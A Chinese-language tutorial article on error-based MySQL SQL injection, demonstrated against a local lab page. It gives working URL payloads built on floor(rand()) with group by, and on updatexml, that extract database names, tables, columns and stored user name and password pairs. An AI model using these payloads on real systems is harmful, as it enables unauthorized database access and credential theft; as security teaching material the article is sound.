溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

發(fā)布時(shí)間:2021-12-10 09:22:55 來(lái)源:億速云 閱讀:127 作者:柒染 欄目:大數(shù)據(jù)

這篇文章將為大家詳細(xì)講解有關(guān)大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個(gè)參考,希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

一、相關(guān)函數(shù)

1、rand():產(chǎn)生一個(gè)0-1之間隨機(jī)數(shù),rand(0),隨機(jī)產(chǎn)生一個(gè)0-1的隨機(jī)數(shù),運(yùn)行多次產(chǎn)生的結(jié)果一樣

2、floor():向下取整,floor(rand()*2),隨機(jī)產(chǎn)生0和1兩個(gè)數(shù)

3、group by:分組排列

4、count(*):統(tǒng)計(jì)數(shù)量

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

5、concat():將字符串連接起來(lái)

二、通過(guò)floor()函數(shù)構(gòu)造注入語(yǔ)句

1、訪問(wèn)http://192.168.0.104/aiyou/bczr.php?id=2,返回正常頁(yè)面

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

2、訪問(wèn)http://192.168.0.104/aiyou/bczr.php?id=2',返回錯(cuò)誤頁(yè)面

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

3、構(gòu)造閉合語(yǔ)句,192.168.0.104/aiyou/bczr.php?id=2' --+,頁(yè)面返回正常

4、獲取數(shù)據(jù)庫(kù)版本

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,(version()))x from information_schema.tables group by x )a) --+

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的5、獲取數(shù)據(jù)庫(kù)名稱

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,database(),0x23)x from information_schema.tables group by x )a) --+

6、獲取其他數(shù)據(jù)庫(kù)名稱(修改紅色數(shù)字,獲取不同數(shù)據(jù)庫(kù)名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

7、獲取表名(修改紅色數(shù)字,獲取不同表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

8、獲取字段名,需要指定表名,表名用十六進(jìn)制表示,修改紅色數(shù)字獲取不同字段

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x75736572 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

9、獲取字段內(nèi)容

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,name,0x3a,pass,0x23) FROM user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

三、通過(guò)updatexml函數(shù)構(gòu)造注入語(yǔ)句

1、獲取數(shù)據(jù)庫(kù)名稱(通過(guò)修改紅色數(shù)字獲取不同的數(shù)據(jù)庫(kù)名稱)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 5,1),1) -- +

2、獲取表名(通過(guò)修改紅色數(shù)字獲取不同的表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 1,1),1) -- +

3、獲取字段名(通過(guò)修改紅色數(shù)字獲取不同的字段)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、獲取字段內(nèi)容(修改紅色數(shù)字,獲取不同字段內(nèi)容)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, pass,0x7e,name,0x7e) from user limit 1,1),1) -- +

大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的

關(guān)于大數(shù)據(jù)中的報(bào)錯(cuò)注入是怎么樣的就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI